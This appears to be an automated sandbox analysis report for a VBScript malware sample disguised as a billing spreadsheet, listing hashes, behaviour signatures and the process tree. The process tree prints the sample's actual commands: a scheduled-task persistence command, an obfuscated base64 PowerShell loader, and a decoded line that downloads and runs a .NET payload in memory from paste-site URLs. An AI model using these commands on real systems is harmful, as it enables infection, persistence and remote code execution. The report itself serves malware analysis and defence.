Resubmissions
12/12/2023, 15:39
231212-s3zdzsfehm 1012/12/2023, 15:32
231212-syk1ssfdgp 1012/12/2023, 15:28
231212-swhgwshad3 10Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
12/12/2023, 15:32
Static task
static1
Behavioral task
behavioral1
Sample
Billed-report2023xls.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Billed-report2023xls.vbs
Resource
win10v2004-20231130-en
General
-
Target
Billed-report2023xls.vbs
-
Size
135KB
-
MD5
81df0d95d784fd74d88174859e7ab470
-
SHA1
03aed26ac800ea6c492e64fb5fd5ab928b3564ee
-
SHA256
da59502967c26be14e52f229feb80beb4672ad5454eb943969f1da9a21815886
-
SHA512
4b76ec39584ab792f17dee8e435834ac50c3c9285fc30fee5a65b32ebf54fc3e918032caeb7f550f0d5d577faf45a8613ec040c6e318afcc0be1f7a47dbd4689
-
SSDEEP
3072:8DupClYAAAA/AAAA4AAAA4AAAA4AAAA4AAAA4AAAAFsx7YX2ojcAAAA4AAAA4AA3:3
Malware Config
Extracted
https://textbin.net/raw/ezjmofz3s6
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2108 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 powershell.exe 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2172 2240 WScript.exe 29 PID 2240 wrote to memory of 2172 2240 WScript.exe 29 PID 2240 wrote to memory of 2172 2240 WScript.exe 29 PID 2240 wrote to memory of 2108 2240 WScript.exe 30 PID 2240 wrote to memory of 2108 2240 WScript.exe 30 PID 2240 wrote to memory of 2108 2240 WScript.exe 30 PID 2240 wrote to memory of 3068 2240 WScript.exe 32 PID 2240 wrote to memory of 3068 2240 WScript.exe 32 PID 2240 wrote to memory of 3068 2240 WScript.exe 32 PID 3068 wrote to memory of 2600 3068 powershell.exe 34 PID 3068 wrote to memory of 2600 3068 powershell.exe 34 PID 3068 wrote to memory of 2600 3068 powershell.exe 34 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn mi /f2⤵PID:2172
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn mi /tr "C:\Users\Admin\AppData\Local\Temp\mi.vbs" /sc minute /mo mi2⤵
- Creates scheduled task(s)
PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bu▒Hg▒d▒Bv▒Ho▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒B3▒G0▒Z▒B0▒H▒▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HY▒ZQBi▒Gg▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dgBl▒GI▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒TQBh▒HI▒YQBj▒GE▒aQBi▒G8▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒TQBz▒HE▒QgBJ▒GI▒WQ▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒d▒BU▒FM▒VQBY▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Hc▒bQBk▒HQ▒c▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒bgB4▒HQ▒bwB6▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs');powershell -command $KByHL;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$nxtoz = '034';$wmdtp = 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs';[Byte[]] $nvebh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($nvebh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/tTSUX/d/ee.etsap//:sptth' , $wmdtp , '____________________________________________-------', $nxtoz, '1', 'Roda' ));"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PDNJ79HV0KCUCC0YYC7.temp
Filesize7KB
MD59292eff7e0e514f0cd05283ce51b968c
SHA14deb0c19e0ec9f2ce726e3ebe97b5dbe10e92e68
SHA256447f6fc85471d6cd111939947e3dd4b0f6da2d5e6b745b640bf72f29a8bdcfd9
SHA512e71df3f40e3a2a32ae4d3c65178c07004527d583c4179f603c47eac92e56f478eaffea06ecb792492bfe24ee2e90a0806c8ccffbc0bf257774a0511c4ca318ea